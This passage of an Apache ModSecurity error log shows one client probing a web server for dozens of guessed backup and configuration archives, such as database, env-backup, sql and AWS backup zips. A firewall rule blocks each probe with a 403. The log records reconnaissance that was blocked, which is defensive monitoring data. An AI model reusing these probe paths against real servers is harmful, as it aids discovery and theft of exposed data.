"OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/aws_cloud.zip"] [unique_id "aa2sJ78gLDtA4xTIJqD4IQAAAAw"] [Sun Mar 08 19:04:39.795535 2026] [:error] [pid 11078:tid 11118] [client 35.189.151.148:44190] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/output.zip"] [unique_id "aa2sJ3-dmvIeGeY060kiqQAAAcg"] [Sun Mar 08 19:04:39.795571 2026] [:error] [pid 13605:tid 13616] [client 35.189.151.148:60236] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/inventory.zip"] [unique_id "aa2sJzLobmDOvyRcAEhfrQAAAMk"] [Sun Mar 08 19:04:39.795583 2026] [:error] [pid 13471:tid 13480] [client 35.189.151.148:40596] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/index.zip"] [unique_id "aa2sJ78gLDtA4xTIJqD4IgAAAAU"] [Sun Mar 08 19:04:39.795590 2026] [:error] [pid 13472:tid 13521] [client 35.189.151.148:44782] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/aws-test.zip"] [unique_id "aa2sJ13UyizU6P-l0YL88wAAAE4"] [Sun Mar 08 19:04:39.795618 2026] [:error] [pid 13605:tid 13624] [client 35.189.151.148:44390] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/laravel.zip"] [unique_id "aa2sJzLobmDOvyRcAEhfrAAAANE"] [Sun Mar 08 19:04:39.795649 2026] [:error] [pid 13473:tid 13547] [client 35.189.151.148:40654] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/backup/database.zip"] [unique_id "aa2sJ0wwZGElJGd8aN_6JQAAAJI"] [Sun Mar 08 19:04:39.795667 2026] [:error] [pid 13473:tid 13553] [client 35.189.151.148:42918] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/error-logs.zip"] [unique_id "aa2sJ0wwZGElJGd8aN_6JgAAAJg"] [Sun Mar 08 19:04:39.795802 2026] [:error] [pid 13471:tid 13498] [client 35.189.151.148:44004] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/source.zip"] [unique_id "aa2sJ78gLDtA4xTIJqD4IwAAABc"] [Sun Mar 08 19:04:39.795816 2026] [:error] [pid 13605:tid 13631] [client 35.189.151.148:42116] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/aws-monitoring.zip"] [unique_id "aa2sJzLobmDOvyRcAEhfrgAAANg"] [Sun Mar 08 19:04:39.795934 2026] [:error] [pid 12902:tid 12944] [client 35.189.151.148:43882] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/config.zip"] [unique_id "aa2sJ2aTUOdovAC89_RAtwAAAok"] [Sun Mar 08 19:04:39.795957 2026] [:error] [pid 13472:tid 13523] [client 35.189.151.148:41044] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/aws-archive.zip"] [unique_id "aa2sJ13UyizU6P-l0YL89AAAAE8"] [Sun Mar 08 19:04:39.795965 2026] [:error] [pid 13605:tid 13626] [client 35.189.151.148:38406] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/access-logs.zip"] [unique_id "aa2sJzLobmDOvyRcAEhfrwAAANM"] [Sun Mar 08 19:04:39.796064 2026] [:error] [pid 13471:tid 13494] [client 35.189.151.148:44396] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/photos.zip"] [unique_id "aa2sJ78gLDtA4xTIJqD4JAAAABM"] [Sun Mar 08 19:04:39.796078 2026] [:error] [pid 13471:tid 13478] [client 35.189.151.148:41802] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/usr.zip"] [unique_id "aa2sJ78gLDtA4xTIJqD4JQAAAAM"] [Sun Mar 08 19:04:39.796193 2026] [:error] [pid 13472:tid 13510] [client 35.189.151.148:44776] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/ftp_backup.zip"] [unique_id "aa2sJ13UyizU6P-l0YL89QAAAEc"] [Sun Mar 08 19:04:39.796217 2026] [:error] [pid 13605:tid 13630] [client 35.189.151.148:39518] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/example.zip"] [unique_id "aa2sJzLobmDOvyRcAEhfsAAAANc"] [Sun Mar 08 19:04:39.796295 2026] [:error] [pid 13471:tid 13492] [client 35.189.151.148:43776] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/archive-2.zip"] [unique_id "aa2sJ78gLDtA4xTIJqD4JgAAABE"] [Sun Mar 08 19:04:39.796444 2026] [:error] [pid 11078:tid 11124] [client 35.189.151.148:40798] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/.archive.zip"] [unique_id "aa2sJ3-dmvIeGeY060kiqgAAAc4"] [Sun Mar 08 19:04:39.796789 2026] [:error] [pid 13605:tid 13611] [client 35.189.151.148:38976] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/deprecated.zip"] [unique_id "aa2sJzLobmDOvyRcAEhfsQAAAMQ"] [Sun Mar 08 19:04:39.796896 2026] [:error] [pid 13471:tid 13477] [client 35.189.151.148:41810] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/digitalocean.zip"] [unique_id "aa2sJ78gLDtA4xTIJqD4JwAAAAI"] [Sun Mar 08 19:04:39.796898 2026] [:error] [pid 11078:tid 11121] [client 35.189.151.148:40646] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/aws_ec2_backup.zip"] [unique_id "aa2sJ3-dmvIeGeY060kiqwAAAcs"] [Sun Mar 08 19:04:39.796953 2026] [:error] [pid 12902:tid 12959] [client 35.189.151.148:42274] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/sensitive.zip"] [unique_id "aa2sJ2aTUOdovAC89_RAuAAAApg"] [Sun Mar 08 19:04:39.796984 2026] [:error] [pid 13472:tid 13528] [client 35.189.151.148:38680] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/plugins.zip"] [unique_id "aa2sJ13UyizU6P-l0YL89gAAAFE"] [Sun Mar 08 19:04:39.797009 2026] [:error] [pid 13471:tid 13479] [client 35.189.151.148:38724] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/env-backup.zip"] [unique_id "aa2sJ78gLDtA4xTIJqD4KAAAAAQ"] [Sun Mar 08 19:04:39.797046 2026] [:error] [pid 13473:tid 13524] [client 35.189.151.148:41804] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/aws_stack_backup.zip"] [unique_id "aa2sJ0wwZGElJGd8aN_6JwAAAIU"] [Sun Mar 08 19:04:39.797093 2026] [:error] [pid 13472:tid 13503] [client 35.189.151.148:43180] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/system-backup.zip"] [unique_id "aa2sJ13UyizU6P-l0YL89wAAAEE"] [Sun Mar 08 19:04:39.797342 2026] [:error] [pid 13472:tid 13509] [client 35.189.151.148:41502] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/backup-12.zip"] [unique_id "aa2sJ13UyizU6P-l0YL8-AAAAEY"] [Sun Mar 08 19:04:39.797642 2026] [:error] [pid 13471:tid 13489] [client 35.189.151.148:42226] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/js_files.zip"] [unique_id "aa2sJ78gLDtA4xTIJqD4KQAAAA4"] [Sun Mar 08 19:04:39.797781 2026] [:error] [pid 13605:tid 13616] [client 35.189.151.148:40238] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/logs_backup.zip"] [unique_id "aa2sJzLobmDOvyRcAEhfsgAAAMk"] [Sun Mar 08 19:04:39.797809 2026] [:error] [pid 13472:tid 13507] [client 35.189.151.148:39202] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/os.zip"] [unique_id "aa2sJ13UyizU6P-l0YL8-QAAAEU"] [Sun Mar 08 19:04:39.797864 2026] [:error] [pid 13471:tid 13476] [client 35.189.151.148:38060] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/media_files.zip"] [unique_id "aa2sJ78gLDtA4xTIJqD4KgAAAAE"] [Sun Mar 08 19:04:39.797912 2026] [:error] [pid 13471:tid 13497] [client 35.189.151.148:38990] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/sql.zip"] [unique_id "aa2sJ78gLDtA4xTIJqD4KwAAABY"] [Sun Mar 08 19:04:39.798119 2026] [:error] [pid 13471:tid 13482] [client 35.189.151.148:41368] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/static-files.zip"] [unique_id "aa2sJ78gLDtA4xTIJqD4LAAAAAc"] [Sun Mar 08 19:04:39.798130 2026] [:error] [pid 13605:tid 13609] [client 35.189.151.148:41402] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/oauth.zip"] [unique_id "aa2sJzLobmDOvyRcAEhfswAAAMI"] [Sun Mar 08 19:04:39.798199 2026] [:error] [pid 13471:tid 13490] [client 35.189.151.148:38798] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/readme_files.zip"] [unique_id "aa2sJ78gLDtA4xTIJqD4LQAAAA8"] [Sun Mar 08 19:04:39.799992 2026] [:error] [pid 13472:tid 13504] [client 35.189.151.148:60466] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/back-up.zip"] [unique_id "aa2sJ13UyizU6P-l0YL8-gAAAEI"] [Sun Mar 08 19:04:39.800582 2026] [:error] [pid 13471:tid 13491] [client 35.189.151.148:60464] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/group.zip"] [unique_id "aa2sJ78gLDtA4xTIJqD4LgAAABA"] [Sun Mar 08 19:04:39.807234 2026] [:error] [pid 13472:tid 13539] [client 35.189.151.148:59848] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/backup_2024.zip"] [unique_id "aa2sJ13UyizU6P-l0YL8-wAAAFY"] [Sun Mar 08 19:04:40.504982 2026] [:error] [pid 13472:tid 13539] [client 35.189.151.148:60894] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/properties.zip"] [unique_id "aa2sKF3UyizU6P-l0YL8_AAAAFY"] [Sun Mar 08 19:04:40.506289 2026] [:error] [pid 13605:tid 13612] [client 35.189.151.148:60386] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/incremental-backup.zip"] [unique_id "aa2sKDLobmDOvyRcAEhftwAAAMU"] [Sun Mar 08 19:04:40.508100 2026] [:error] [pid 13472:tid 13525] [client 35.189.151.148:60802] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag 